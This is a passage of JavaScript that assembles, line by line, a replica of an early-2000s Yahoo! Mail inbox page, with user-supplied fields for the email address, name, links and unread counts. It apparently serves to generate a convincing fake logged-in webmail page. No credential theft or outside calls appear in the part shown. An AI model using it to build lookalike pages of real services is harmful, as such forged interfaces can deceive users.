src="+K+"fs_pb_fitted_072002b.js"+K+">\n" clrar.value+=" </"+F+"CRIPT>\n" clrar.value+=" <NOSCRIPT>\n" clrar.value+=" <A \n" clrar.value+=" href="+K+"http://rd.yahoo.com/M=243098.2891634.42380 18.1284474/D=mail/S=150500014:PB/A=1579788/R=4/id= noscript/SIG=18aib6l1q/*http://shop.store.yahoo.com/cgibin/clink?hp3+shopping:dmad/M=243098.2891634.423801 8.1284474/D=mail/S=150500014:PB/A=1579788/R=5/105 7492859+http://us.rmi.yahoo.com/rmi/http://www.compaq. com/rmi-framedurl/http://www.compaq.com/bridge/poweredby/smb/indexyahoo.html"+K+" \n" clrar.value+=" target=_blank><IMG height=28 \n" clrar.value+=" src="+K+"pbhp_84x28_blu_yahoo.gif"+K+" \n" clrar.value+=" width=84 border=0></A></NOSCRIPT></TD></TR></TBODY></TA BLE></TD>\n" clrar.value+=" <TD vAlign=top noWrap align=right width="+K+"1%"+K+">\n" clrar.value+=" <FORM style="+K+"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"+K+" \n" clrar.value+=" action=http://srd.yahoo.com/fp=150500001&loc=head&st= yahoo/*http://search.yahoo.com/search \n" clrar.value+=" target=_blank><INPUT type=hidden value=ush1-mail name=fr> \n" clrar.value+=" <TABLE cellSpacing=0 cellPadding=0 width=250 border=0>\n" clrar.value+=" <TBODY>\n" clrar.value+=" <TR vAlign=top>\n" clrar.value+=" <TD align=right width=17><IMG height=30 alt="+K+""+K+" \n" clrar.value+=" src="+K+"sch_ang30_1.gif"+K+" \n" clrar.value+=" width=17></TD>\n" clrar.value+=" <TD vAlign=center align=middle

bgColor=#dcdcdc>\n" clrar.value+=" <TABLE cellSpacing=0 cellPadding=0 border=0>\n" clrar.value+=" <TBODY>\n" clrar.value+=" <TR>\n" clrar.value+=" <TD><IMG height=16 \n" clrar.value+=" src="+K+"stw2.gif"+K+" \n" clrar.value+=" width=38> </TD>\n" clrar.value+=" <TD><INPUT title="+K+"enter search terms here"+K+" size=12 name=p></TD>\n" clrar.value+=" <TD><INPUT type=submit value=Search></TD></TR></TBODY></TABLE></TD></ TR></TBODY></TABLE></FORM></TD></TR>\n" clrar.value+=" <TR>\n" clrar.value+=" <TD noWrap colSpan=2 height=5><SPACER height="+K+"1"+K+" width="+K+"1"+K+" \n" clrar.value+=" type="+K+"block"+K+"></TD></TR></TBODY></TABLE> </DIV><!-- end search masthead -->\n" clrar.value+="<CENTER><!-- SpaceID=150500014 loc=SREC noad --></CENTER><BR>\n" clrar.value+="<script>\n" clrar.value+=" var oKey = new ylib_keyevt();\n" clrar.value+=" oKey.addKey(67,1,"+K+"location='http://us.f137.mail.yahoo.com/ym/ShowF older?rb=Inbox&YY=33422&YN=1'"+K+","+K+"shift+ctrl"+ K+"); // Check Mail | CTRL-C\n" clrar.value+=" oKey.addKey(80,1,"+K+"location='http://us.f137.mail.yahoo.com/ym/Compo se?YY=33422'"+K+","+K+"shift+ctrl"+K+"); // Compose | CTRL-P\n" clrar.value+=" oKey.addKey(70,1,"+K+"location='http://us.f137.mail.yahoo.com/ym/Folder s?YY=33422'"+K+","+K+"shift+ctrl"+K+"); // Folders | CTRL-F\n" clrar.value+=" oKey.addKey(83,1,"+K+"location='http://us.f137.mail.yahoo.com/ym/Search ?YY=33422'"+K+","+K+"shift+ctrl"+K+"); // Search |

CTRL-S\n" clrar.value+=" oKey.addKey(72,1,"+K+"location='http://help.yahoo.com/help/us/mail'"+K+ ","+K+"shift+ctrl"+K+"); // Help | CTRL-H\n" clrar.value+="</"+F+"CRIPT>\n\n" clrar.value+="<script language=javascript>\n" clrar.value+="<!-- \n" clrar.value+=" function init() \n" clrar.value+=" { \n" clrar.value+=" if (oBw.ie||oBw.dom) { \n\n" clrar.value+=" ypim_initMenu('mail','addr','cal','note'); // initiates the drop down menus \n" clrar.value+=" document.onkeydown = function(evt) { oKey.keyevent(evt); }\n" clrar.value+=" }\n" clrar.value+=" OnLoad(); // do not delete\n" clrar.value+=" }\n\n" clrar.value+=" clrar.value+=" clrar.value+=" clrar.value+=" clrar.value+=" function OnLoad()\n" {\n" // noop by default\n" // redefine as needed\n" }\n"

clrar.value+=" onload=init\n" clrar.value+=" //-->\n" clrar.value+="</"+F+"CRIPT>\n\n" clrar.value+="<TABLE cellSpacing=0 cellPadding=0 border=0>\n" clrar.value+=" <TBODY>\n" clrar.value+=" <TR>\n" clrar.value+=" <TD class=tabhi width="+K+"1%"+K+">\n" clrar.value+=" <TABLE id=mailTb cellSpacing=0 cellPadding=0 width="+K+"100%"+K+" border=0>\n" clrar.value+=" <TBODY>\n"

clrar.value+=" <TR>\n" clrar.value+=" <TD class=tabhia id=mail1>\n" clrar.value+=" <TABLE cellSpacing=0 cellPadding=0 width="+K+"100%"+K+" border=0>\n" clrar.value+=" <TBODY>\n" clrar.value+=" <TR>\n" clrar.value+=" <TD><A href="+K+"http://mail.yahoo.com/"+K+"><IMG height=24 \n" clrar.value+=" alt="+K+"Yahoo! Mail"+K+" hspace=4 \n" clrar.value+=" src="+K+"mailbr1.gif"+K+" \n" clrar.value+=" width=24 border=0 name=iconmail></A></TD>\n" clrar.value+=" <TD class=tabhit noWrap><A \n" clrar.value+=" href="+K+"http://mail.yahoo.com/"+K+">Mail</A> </TD></TR></TBODY></TABLE></TD>\n" clrar.value+=" <TD class=tabhia id=mailBtn vAlign=center><A \n" clrar.value+=" onclick="+K+"ypim_prepareMail(); return ypim_showMenu('mail')"+K+" \n" clrar.value+=" href="+K+"http://mail.yahoo.com/"+K+"><IMG height=24 \n" clrar.value+=" src="+K+"downbr1.gif"+K+" width=10 \n" clrar.value+=" border=0 name=arr_mail></A></TD></TR></TBODY></TABLE></ TD>\n" clrar.value+=" <TD class=tablor width="+K+"1%"+K+">\n" clrar.value+=" <TABLE id=addrTb cellSpacing=0 cellPadding=0 width="+K+"100%"+K+" border=0>\n" clrar.value+=" <TBODY>\n" clrar.value+=" <TR>\n" clrar.value+=" <TD class=tabloa id=addr1>\n" clrar.value+=" <TABLE cellSpacing=0 cellPadding=0 width="+K+"100%"+K+" border=0>\n" clrar.value+=" <TBODY>\n"

clrar.value+=" <TR>\n" clrar.value+=" <TD><A href="+K+"http://address.yahoo.com/yab/us"+K+"><IMG height=24 \n" clrar.value+=" alt="+K+"Yahoo! Address Book"+K+" hspace=4 \n" clrar.value+=" src="+K+"abbr1.gif"+K+" \n" clrar.value+=" width=24 border=0 name=iconaddr></A></TD>\n" clrar.value+=" <TD class=tablot noWrap><A \n" clrar.value+=" href="+K+"http://mail.yahoo.com/"+K+">Mail</A> </TD></TR></TBODY></TABLE></TD>\n" clrar.value+=" <TD class=tabhia id=mailBtn vAlign=center><A \n" clrar.value+=" onclick="+K+"ypim_prepareMail(); return ypim_showMenu('mail')"+K+" \n" clrar.value+=" href="+K+"http://mail.yahoo.com/"+K+"><IMG height=24 \n" clrar.value+=" src="+K+"downbr1.gif"+K+" width=10 \n" clrar.value+=" border=0 name=arr_mail></A></TD></TR></TBODY></TABLE></ TD>\n" clrar.value+=" <TD class=tablor width="+K+"1%"+K+">\n" clrar.value+=" <TABLE id=addrTb cellSpacing=0 cellPadding=0 width="+K+"100%"+K+" border=0>\n" clrar.value+=" <TBODY>\n" clrar.value+=" <TR>\n" clrar.value+=" <TD class=tabloa id=addr1>\n" clrar.value+=" <TABLE cellSpacing=0 cellPadding=0 width="+K+"100%"+K+" border=0>\n" clrar.value+=" <TBODY>\n" clrar.value+=" <TR>\n" clrar.value+=" <TD><A href="+K+"http://address.yahoo.com/yab/us"+K+"><IMG height=24 \n"

clrar.value+=" alt="+K+"Yahoo! Address Book"+K+" hspace=4 \n" clrar.value+=" src="+K+"abbr1.gif"+K+" \n" clrar.value+=" width=24 border=0 name=iconaddr></A></TD>\n" clrar.value+=" <TD class=tablot noWrap><A \n" clrar.value+=" href="+K+"http://address.yahoo.com/yab/us"+K+">Addres ses</A> </TD></TR></TBODY></TABLE></TD>\n" clrar.value+=" <TD class=tabloa id=addrBtn vAlign=center><A \n" clrar.value+=" onclick="+K+"ypim_prepareAddr(); return ypim_showMenu('addr')"+K+" \n" clrar.value+=" href="+K+"http://address.yahoo.com/yab/us"+K+"><IMG height=24 \n" clrar.value+=" src="+K+"downbr1.gif"+K+" width=10 \n" clrar.value+=" border=0 name=arr_addr></A></TD></TR></TBODY></TABLE></ TD>\n" clrar.value+=" <TD class=tablor width="+K+"1%"+K+">\n" clrar.value+=" <TABLE id=calTb cellSpacing=0 cellPadding=0 width="+K+"100%"+K+" border=0>\n" clrar.value+=" <TBODY>\n" clrar.value+=" <TR>\n" clrar.value+=" <TD class=tabloa id=cal1>\n" clrar.value+=" <TABLE cellSpacing=0 cellPadding=0 width="+K+"100%"+K+" border=0>\n" clrar.value+=" <TBODY>\n" clrar.value+=" <TR>\n" clrar.value+="<TD><A href="+K+"http://calendar.yahoo.com/"+K+"><IMG height=24 \n" clrar.value+=" alt="+K+"Yahoo! Calendar"+K+" hspace=4 \n" clrar.value+=" src="+K+"calbr1.gif"+K+" \n" clrar.value+=" width=24 border=0

name=iconcal></A></TD>\n" clrar.value+=" <TD class=tablot noWrap><A \n" clrar.value+=" href="+K+"http://calendar.yahoo.com/"+K+">Calendar</A > </TD></TR></TBODY></TABLE></TD>\n" clrar.value+=" <TD class=tabloa id=calBtn vAlign=center><A \n" clrar.value+=" onclick="+K+"ypim_prepareCal(); return ypim_showMenu('cal')"+K+" \n" clrar.value+=" href="+K+"http://calendar.yahoo.com/"+K+"><IMG height=24 \n" clrar.value+=" src="+K+"downbr1.gif"+K+" width=10 \n" clrar.value+=" border=0 name=arr_cal></A></TD></TR></TBODY></TABLE></T D>\n" clrar.value+=" <TD class=tablor width="+K+"1%"+K+">\n" clrar.value+=" <TABLE id=noteTb cellSpacing=0 cellPadding=0 width="+K+"100%"+K+" border=0>\n" clrar.value+=" <TBODY>\n" clrar.value+=" <TR>\n" clrar.value+=" <TD class=tabloa id=note1>\n" clrar.value+=" <TABLE cellSpacing=0 cellPadding=0 width="+K+"100%"+K+" border=0>\n" clrar.value+=" <TBODY>\n" clrar.value+=" <TR>\n" clrar.value+=" <TD><A href="+K+"http://notepad.yahoo.com/"+K+"><IMG height=24 \n" clrar.value+=" alt="+K+"Yahoo! Notepad"+K+" hspace=4 \n" clrar.value+=" src="+K+"npdbr1.gif"+K+" \n" clrar.value+=" width=24 border=0 name=iconnote></A></TD>\n" clrar.value+=" <TD class=tablot noWrap><A \n" clrar.value+=" href="+K+"http://notepad.yahoo.com/"+K+">Notepad</A

> </TD></TR></TBODY></TABLE></TD>\n" clrar.value+=" <TD class=tabloa id=noteBtn vAlign=center><A \n" clrar.value+=" onclick="+K+"ypim_prepareNote(); return ypim_showMenu('note')"+K+" \n" clrar.value+=" href="+K+"http://notepad.yahoo.com/"+K+"><IMG height=24 \n" clrar.value+=" src="+K+"downbr1.gif"+K+" width=10 \n" clrar.value+=" border=0 name=arr_note></A></TD></TR></TBODY></TABLE></ TD>\n" clrar.value+=" <TD class=tabnone align=right width="+K+"95%"+K+"><B>"+b1.value+"@yahoo.com</ B> [<A \n" clrar.value+=" href="+K+""+b3.value+""+K+">Sign \n" clrar.value+=" Out</A>] </TD></TR></TBODY></TABLE>\n" clrar.value+="<TABLE cellSpacing=0 cellPadding=4 width="+K+"100%"+K+" border=0>\n" clrar.value+=" <TBODY>\n" clrar.value+=" <TR class=bgd bgColor=#e4ecf6>\n" clrar.value+=" <TD align=left>\n" clrar.value+=" <TABLE cellSpacing=0 cellPadding=2 border=0>\n" clrar.value+=" <TBODY>\n" clrar.value+=" <TR>\n" clrar.value+=" <TD class=tbutton \n" clrar.value+=" onclick="+K+"window.open('/ym/ShowFolder?rb=Inbox&YY =33422&YN=1', '_top')"+K+" \n" clrar.value+=" width=100><A \n" clrar.value+=" href="+K+""+b2.value+""+K+">Check Mail</A> </TD>\n" clrar.value+=" <TD> </TD>\n" clrar.value+=" <TD class=tbutton \n" clrar.value+=" onclick="+K+"window.open('/ym/Compose?YY=33422',

'_top')"+K+" width=100><A \n" clrar.value+=" href="+K+""+b2.value+""+K+">Compose</A> \n" clrar.value+=" </TD></TR></TBODY></TABLE></TD>\n" clrar.value+=" <TD vAlign=bottom align=right>\n" clrar.value+=" <TABLE cellSpacing=0 cellPadding=4 border=0>\n" clrar.value+=" <TBODY>\n" clrar.value+=" <TR>\n" clrar.value+=" <TD class=bge bgColor=#e4ecf6><A \n" clrar.value+=" href="+K+"http://us.rd.yahoo.com/mail_us/nav/?http://billi ng.mail.yahoo.com/bm/Upgrades"+K+" \n" clrar.value+=" target=_blank>Mail Upgrades</A> - <A \n" clrar.value+=" href="+K+"http://us.f137.mail.yahoo.com/ym/Search?YY=3 3422"+K+">Search \n" clrar.value+=" Mail</A> - <A \n" clrar.value+=" href="+K+"http://us.f137.mail.yahoo.com/ym/Options?YY= 33422"+K+"><B>Mail \n" clrar.value+=" Options</B></A></TD></TR></TBODY></TABLE></TD> </TR></TBODY></TABLE>\n" clrar.value+="<TABLE cellSpacing=0 cellPadding=0 width="+K+"100%"+K+" border=0>\n" clrar.value+=" <TBODY>\n" clrar.value+=" <TR>\n" clrar.value+=" <TD class=bgd bgColor=#9bbad6 height=4><IMG height=3 \n" clrar.value+=" src="+K+"space.gif"+K+" \n" clrar.value+=" width=2></TD></TR></TBODY></TABLE>\n" clrar.value+="<TABLE cellSpacing=0 cellPadding=0 width="+K+"100%"+K+" border=0>\n" clrar.value+=" <TBODY>\n" clrar.value+=" <TR>\n" clrar.value+=" <TD class=bgd vAlign=top width=160

bgColor=#9bbad6>\n" clrar.value+=" <script>\n" clrar.value+="function AddFolder()\n" clrar.value+=" {\n" clrar.value+=" var nn = window.prompt("+K+"Please enter a name for your folder."+K+","+K+""+K+");\n" clrar.value+=" if (nn != null && nn != "+K+"null"+K+" && nn != "+K+""+K+") {\n" clrar.value+=" var nn_escaped = "+K+""+K+";\n" clrar.value+=" var nn_len = nn.length;\n" clrar.value+=" for (i = 0 ; i < nn_len ; i++) {\n" clrar.value+=" var nn_asc = nn.charCodeAt(i);\n" clrar.value+=" if (nn_asc > 128) {\n" clrar.value+=" nn_escaped += nn.charAt(i);\n" clrar.value+=" } else {\n" clrar.value+=" nn_escaped += escape(nn.charAt(i));\n" clrar.value+=" }\n" clrar.value+=" }\n\n" clrar.value+=" var str = "+K+"/ym/Folders?ADD=1&Name="+K+" + nn_escaped + "+K+"&.crumb=QwcGQPZ3xYZ&.done="+K+" + escape(document.URL) + "+K+"&YY=33422"+K+";\n" clrar.value+=" window.open(str, "+K+"_top"+K+");\n" clrar.value+=" }\n" clrar.value+=" }\n\n" clrar.value+=" function TogglePersonal()\n" clrar.value+=" {\n" clrar.value+=" window.open(\n" clrar.value+=" "+K+"/ym/Welcome?pers=1&.done="+K+" \n" clrar.value+=" + \n" clrar.value+=" escape(document.URL) \n" clrar.value+=" + \n" clrar.value+=" "+K+"&YY=33422"+K+", \n" clrar.value+=" "+K+"_top"+K+"\n" clrar.value+=" );\n" clrar.value+=" }\n" clrar.value+=" </"+F+"CRIPT>\n"

clrar.value+="<TABLE cellSpacing=0 cellPadding=2 width="+K+"100%"+K+" border=0>\n" clrar.value+=" <TBODY>\n" clrar.value+=" <TR>\n" clrar.value+=" <TD height=6></TD></TR>\n" clrar.value+=" <TR class=ftitle>\n" clrar.value+=" <TD colSpan=2> <A \n" clrar.value+=" href="+K+"http://us.f137.mail.yahoo.com/ym/Folders?YY= 33422"+K+"><B>Folders</B></A> \n" clrar.value+=" <SMALL>[<A href="+K+"javascript:AddFolder()"+K+">Add</A>]</SMAL L> </TD></TR>\n" clrar.value+=" <TR class=flo>\n" clrar.value+=" <TD noWrap width="+K+"1%"+K+"> <IMG height=16 \n" clrar.value+=" src="+K+"inbc1.gif"+K+" width=16> \n" clrar.value+=" </TD>\n" clrar.value+=" <TD><A href="+K+""+b2.value+""+K+"><B>Inbox ("+b4.value+")</B></A> </TD></TR>\n" clrar.value+=" <TR class=flo>\n" clrar.value+=" <TD noWrap width="+K+"1%"+K+"> <IMG height=16 \n" clrar.value+=" src="+K+"dftc1.gif"+K+" width=16> \n" clrar.value+=" </TD>\n" clrar.value+=" <TD><A href="+K+""+b2.value+""+K+">Draft</A> \n" clrar.value+=" </TD></TR>\n" clrar.value+=" <TR class=flo>\n" clrar.value+=" <TD noWrap width="+K+"1%"+K+"> <IMG height=16 \n" clrar.value+=" src="+K+"sntc1.gif"+K+" width=16> \n" clrar.value+=" </TD>\n" clrar.value+=" <TD><A \n" clrar.value+=" href="+K+""+b2.value+""+K+">Sent</A> \n" clrar.value+=" </TD></TR>\n"

clrar.value+=" <TR class=flo>\n" clrar.value+=" <TD noWrap width="+K+"1%"+K+"> <IMG height=16 \n" clrar.value+=" src="+K+"blkc1.gif"+K+" width=16> \n" clrar.value+=" </TD>\n" clrar.value+=" <TD><A href="+K+""+b2.value+""+K+"><B>Bulk ("+b5.value+")</B></A>\n" clrar.value+=" <SMALL>[<A href="+K+""+b2.value+""+K+">Empty</A>]</SMALL> \n" clrar.value+=" </TD></TR>\n" clrar.value+=" <TR class=flo>\n" clrar.value+=" <TD noWrap width="+K+"1%"+K+"> <IMG height=16 \n" clrar.value+=" src="+K+"tshc1.gif"+K+" width=16> \n" clrar.value+=" </TD>\n" clrar.value+=" <TD><A \n" clrar.value+=" href="+K+""+b2.value+""+K+">Trash</A> \n" clrar.value+=" <SMALL>[<A \n" clrar.value+=" href="+K+""+b2.value+""+K+">Empty</A>]</SMALL> \n" clrar.value+=" </TD></TR>\n" clrar.value+=" <TR>\n" clrar.value+="<TD colSpan=2 height=5><IMG height=5 alt="+K+""+K+" \n" clrar.value+=" src="+K+"space.gif"+K+" width=5> \n" clrar.value+=" </TD></TR>\n" clrar.value+=" <TR class=flo>\n" clrar.value+=" <TD colSpan=2><!--X-->\n" clrar.value+=" <P>\n" clrar.value+=" <TABLE cellSpacing=0 cellPadding=0 border=0>\n" clrar.value+=" <TBODY>\n" clrar.value+=" <TR>\n"

clrar.value+=" <TD><A \n" clrar.value+=" href="+K+"http://rd.yahoo.com/M=245829.2916373.47723 18.2058947/D=mail/S=150500014:SW1/A=1643659/R=0/S IG=12aln3g86/*https://qspace.iplace.com/cobrands/27/ord er1_1.asp?p=1&amp;afd=3&amp;sc=1485sb09"+K+" \n" clrar.value+=" target=_blank><IMG height=25 \n" clrar.value+=" src="+K+"stickey25.gif"+K+" \n" clrar.value+=" width=25 border=0></A></TD>\n" clrar.value+=" <TD><A \n" clrar.value+=" href="+K+"http://rd.yahoo.com/M=245829.2916373.47723 18.2058947/D=mail/S=150500014:SW1/A=1643659/R=1/S IG=12aln3g86/*https://qspace.iplace.com/cobrands/27/ord er1_1.asp?p=1&amp;afd=3&amp;sc=1485sb09"+K+" \n" clrar.value+=" target=_blank><FONT size=2><B>Check Your <BR>Credit For \n" clrar.value+=" Free</B></FONT></A> </TD></TR></TBODY></TABLE><!--X-></P></TD></TR>\n" clrar.value+=" <TR class=flo>\n" clrar.value+=" <TD colSpan=2>\n" clrar.value+=" <TABLE cellSpacing=0 cellPadding=0 border=0>\n" clrar.value+=" <TBODY>\n" clrar.value+=" <TR>\n" clrar.value+=" <TD><A \n" clrar.value+=" href="+K+"http://rd.yahoo.com/M=254576.3497087.47827 74.2046184/D=mail/S=150500014:SW2/A=1455139/R=0/S IG=12lvho5g2/*http://www.servicemagic.com/servlet/Redir ectServlet?m=yahoo&amp;D=HOME&amp;entry_point_id=7 "+K+" \n" clrar.value+=" target=_blank><IMG height=25 \n" clrar.value+=" src="+K+"icon121.gif"+K+" \n" clrar.value+=" width=25 border=0></A></TD>\n" clrar.value+=" <TD><A \n" clrar.value+="

href="+K+"http://rd.yahoo.com/M=254576.3497087.47827 74.2046184/D=mail/S=150500014:SW2/A=1455139/R=1/S IG=12lvho5g2/*http://www.servicemagic.com/servlet/Redir ectServlet?m=yahoo&amp;D=HOME&amp;entry_point_id=7 "+K+" \n" clrar.value+=" target=_blank><FONT size=2>Rated Home<BR>Contractors \n" clrar.value+=" </FONT></A></TD></TR></TBODY></TABLE></TD></T R>\n" clrar.value+=" <TR class=flo>\n" clrar.value+=" <TD colSpan=2>\n" clrar.value+=" <TABLE cellSpacing=0 cellPadding=0 border=0>\n" clrar.value+=" <TBODY>\n" clrar.value+=" <TR>\n" clrar.value+=" <TD><A \n" clrar.value+=" href="+K+"http://rd.yahoo.com/M=236179.2446108.38844 32.2070966/D=mail/S=150500014:SW3/A=1657277/R=0/S IG=10svmjo69/*http://efax.mail.yahoo.com"+K+" \n" clrar.value+=" target=_blank><IMG height=25 \n" clrar.value+=" src="+K+"efax_man_july.gif"+K+" \n" clrar.value+=" width=25 border=0></A></TD>\n" clrar.value+=" <TD><A \n" clrar.value+=" href="+K+"http://rd.yahoo.com/M=236179.2446108.38844 32.2070966/D=mail/S=150500014:SW3/A=1657277/R=1/S IG=10svmjo69/*http://efax.mail.yahoo.com"+K+" \n" clrar.value+=" target=_blank><FONT size=2>FREE Fax Number<BR>For Your Y! \n" clrar.value+=" Mail</FONT></A> </TD></TR></TBODY></TABLE></TD></TR>\n" clrar.value+=" <TR class=flo>\n" clrar.value+=" <TD colSpan=2><!--X-->\n" clrar.value+=" <P>\n" clrar.value+=" <TABLE cellSpacing=0 cellPadding=0 border=0>\n"

clrar.value+=" <TBODY>\n" clrar.value+=" <TR>\n" clrar.value+=" <TD><A \n" clrar.value+=" href="+K+"http://rd.yahoo.com/M=246920.3523192.48037 79.2135186/D=mail/S=150500014:SW4/A=1642781/R=0/S IG=12kppu53p/*http://www.gotomypc.com/u/tr/yh/cpm/m ail/SW4/25x25PC_10/g22lp?Target=mm/g22lp.tmpl"+K+"> <IMG \n" clrar.value+=" height=25 \n" clrar.value+=" src="+K+"25x25_PC-icon.gif"+K+" \n" clrar.value+=" width=25 border=0></A></TD>\n" clrar.value+=" <TD><A \n" clrar.value+=" href="+K+"http://rd.yahoo.com/M=246920.3523192.48037 79.2135186/D=mail/S=150500014:SW4/A=1642781/R=1/S IG=12hdrnou3/*http://www.gotomypc.com/u/tr/yh/cpm/ma il/SW4/25chtext10/PC?Target=mm/g22lp.tmpl"+K+" \n" clrar.value+=" target=_blank><FONT size=2>Access Your Office <BR>Files from \n" clrar.value+=" Home</FONT></A> \n" clrar.value+=" </TD></TR></TBODY></TABLE><!--X-></P></TD></TR></TBODY></TABLE></TD>\n" clrar.value+=" <TD class=bgd width=8 bgColor=#9bbad6><IMG height=2 \n" clrar.value+=" src="+K+"space.gif"+K+" width=8></TD>\n" clrar.value+=" <TD vAlign=top>\n" clrar.value+="<TABLE cellSpacing=0 cellPadding=0 width="+K+"100%"+K+" border=0>\n" clrar.value+=" <TBODY>\n" clrar.value+=" <TR>\n" clrar.value+=" <TD bgColor=white>\n" clrar.value+=" <DIV class=bgd style="+K+"WIDTH: 5px; HEIGHT: 5px"+K+"><IMG height=5 \n" clrar.value+=" src="+K+"rdul1.gif"+K+" \n" clrar.value+=" width=5></DIV></TD></TR></TBODY></TABLE>\n"

clrar.value+=" <TABLE cellSpacing=0 cellPadding=4 width="+K+"100%"+K+" bgColor=white border=0>\n" clrar.value+=" <TBODY>\n" clrar.value+=" <TR>\n" clrar.value+=" <TD vAlign=top>\n" clrar.value+=" <TABLE cellSpacing=0 cellPadding=4 width="+K+"100%"+K+" border=0>\n" clrar.value+=" <TBODY>\n" clrar.value+=" <TR>\n" clrar.value+=" <TD class=mtitle colSpan=2>Welcome, "+b7.value+" </TD></TR>\n" clrar.value+=" <TR vAlign=top>\n" clrar.value+=" <TD align=middle width=28><IMG height=18 \n" clrar.value+=" src="+K+"newmail1.gif"+K+" \n" clrar.value+=" width=28> </TD>\n" clrar.value+=" <TD vAlign=top>You have <B>"+b6.value+" unread messages</B>:<BR><B><A \n" clrar.value+=" href="+K+""+b2.value+""+K+">Inbox&nbsp;("+b4.value+" )</A></B>,&nbsp; \n" clrar.value+=" <B><A \n" clrar.value+=" href="+K+""+b2.value+""+K+">Bulk&nbsp;("+b5.value+") </A></B>&nbsp; \n" clrar.value+=" </TD></TR>\n" clrar.value+=" <TR>\n" clrar.value+=" <TD colSpan=2 height=5><IMG height=5 \n" clrar.value+=" src="+K+"space.gif"+K+" \n" clrar.value+=" width=1></TD></TR></TBODY></TABLE>\n" clrar.value+=" <TABLE cellSpacing=6 cellPadding=0 border=0>\n" clrar.value+=" <TBODY>\n" clrar.value+=" <TR>\n" clrar.value+=" <TD vAlign=top><IMG height=16 \n" clrar.value+=" src="+K+"bulb1.gif"+K+" \n"

clrar.value+=" width=16> </TD>\n" clrar.value+=" <TD><B>Today's tip: </B>Before you click "+K+"Send,"+K+" ask yourself \n" clrar.value+=" if each and every recipient will want to read your \n" clrar.value+=" email.</TD></TR></TBODY></TABLE>\n" clrar.value+=" <CENTER>\n" clrar.value+=" <DIV class=bgd style="+K+"MARGIN: 8px; WIDTH: 90%; HEIGHT: 1px"+K+"><SPACER \n" clrar.value+=" height="+K+"1"+K+" width="+K+"1"+K+" type="+K+"block"+K+"></DIV></CENTER>\n" clrar.value+=" <TABLE cellSpacing=0 cellPadding=4 width="+K+"100%"+K+" border=0>\n" clrar.value+=" <TBODY>\n" clrar.value+=" <TR>\n" clrar.value+=" <TD>\n" clrar.value+=" <TABLE cellSpacing=0 cellPadding=0 width="+K+"100%"+K+" \n" clrar.value+=" bgColor=#ffffff border=0>\n" clrar.value+=" <TBODY>\n" clrar.value+=" <TR>\n" clrar.value+="<TD width=68><A \n" clrar.value+=" href="+K+"http://us.rd.yahoo.com//mail_us/upgrade/evt=8 754/*http://mailplus.mail.yahoo.com/mp_splash_launch.ph p?b=lv"+K+" \n" clrar.value+=" target=_blank><IMG height=60 \n" clrar.value+=" src="+K+"sp_storage60_1.gif"+K+" \n" clrar.value+=" width=68 border=0></A></TD>\n" clrar.value+=" <TD noWrap>&nbsp;&nbsp;</TD>\n" clrar.value+=" <TD vAlign=top><A \n" clrar.value+=" href="+K+"http://us.rd.yahoo.com//mail_us/upgrade/evt=8 754/*http://mailplus.mail.yahoo.com/mp_splash_launch.ph p?b=lv"+K+" \n" clrar.value+=" target=_blank><IMG height=18 \n" clrar.value+=" src="+K+"hd_storage_1.gif"+K+" \n"

clrar.value+=" width=220 vspace=3 border=0></A><BR>For those of you who \n" clrar.value+=" can't throw anything away. <NOBR><B><A \n" clrar.value+=" href="+K+"http://us.rd.yahoo.com//mail_us/upgrade/evt=8 754/*http://mailplus.mail.yahoo.com/mp_splash_launch.ph p?b=lv"+K+" \n" clrar.value+=" target=_blank>Learn \n" clrar.value+=" more</A></B></NOBR></TD></TR></TBODY></TABLE ><BR>\n" clrar.value+=" <TABLE cellSpacing=0 cellPadding=1 width=300 bgColor=#057ebc \n" clrar.value+=" border=0>\n" clrar.value+=" <TBODY>\n" clrar.value+=" <TR>\n" clrar.value+=" <FORM style="+K+"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"+K+" \n" clrar.value+=" action=http://pa.yahoo.com/*http://rd.yahoo.com/personal s/ext/evt=8120/*http://personals.yahoo.com/display \n" clrar.value+=" target=_blank><INPUT type=hidden value=mantle \n" clrar.value+=" name=frommod><INPUT type=hidden value=table \n" clrar.value+=" name=ct_hft><INPUT type=hidden value=dregion- \n" clrar.value+=" name=cr><INPUT type=hidden value=2 name=advs><INPUT \n" clrar.value+=" type=hidden value=1 name=form><INPUT type=hidden value=0 \n" clrar.value+=" name=twoway><INPUT type=hidden value=y name=purlf>\n" clrar.value+=" <TD>\n" clrar.value+=" <TABLE cellSpacing=0 cellPadding=0 width="+K+"100%"+K+" \n" clrar.value+=" bgColor=#c8e9f8 border=0>\n"

clrar.value+=" <TBODY>\n" clrar.value+=" <TR>\n" clrar.value+=" <TD width=108 bgColor=#057ebc><A \n" clrar.value+=" href="+K+"http://pa.yahoo.com/*http://rd.yahoo.com/pers onals/ext/evt=8122/*http://personals.yahoo.com/"+K+">< IMG \n" clrar.value+=" height=58 alt="+K+"Yahoo! Personals"+K+" \n" clrar.value+=" src="+K+"couple_blu_e.gif"+K+" \n" clrar.value+=" width=107 border=0></A></TD>\n" clrar.value+=" <TD align=middle>\n" clrar.value+=" <TABLE cellSpacing=2 cellPadding=0 border=0>\n" clrar.value+=" <TBODY>\n" clrar.value+=" <TR>\n" clrar.value+=" <TD noWrap><FONT face=arial size=-1>I'm <SELECT \n" clrar.value+=" name=ce_p><OPTION value=Woman \n" clrar.value+=" selected>W</OPTION><OPTION \n" clrar.value+=" value=Man>M</OPTION></SELECT> seeking <SELECT \n" clrar.value+=" name=ce_g><OPTION value=Man \n" clrar.value+=" selected>M</OPTION><OPTION \n" clrar.value+=" value=Woman>W</OPTION></SELECT></FONT></TD></ TR>\n" clrar.value+=" <TR>\n" clrar.value+=" <TD noWrap><FONT face=arial size=1>Zip: <INPUT \n" clrar.value+=" maxLength=80 size=6 name=.pcsz>&nbsp;<INPUT type=submit value=Search name=Action></FONT></TD></TR></TBODY></TABLE> </TD></TR></TBODY></TABLE></TD></FORM></TR></ TBODY></TABLE></TD></TR></TBODY></TABLE></TD> \n" clrar.value+=" <TD vAlign=top width=300 bgColor=white><SMALL>You are using \n"

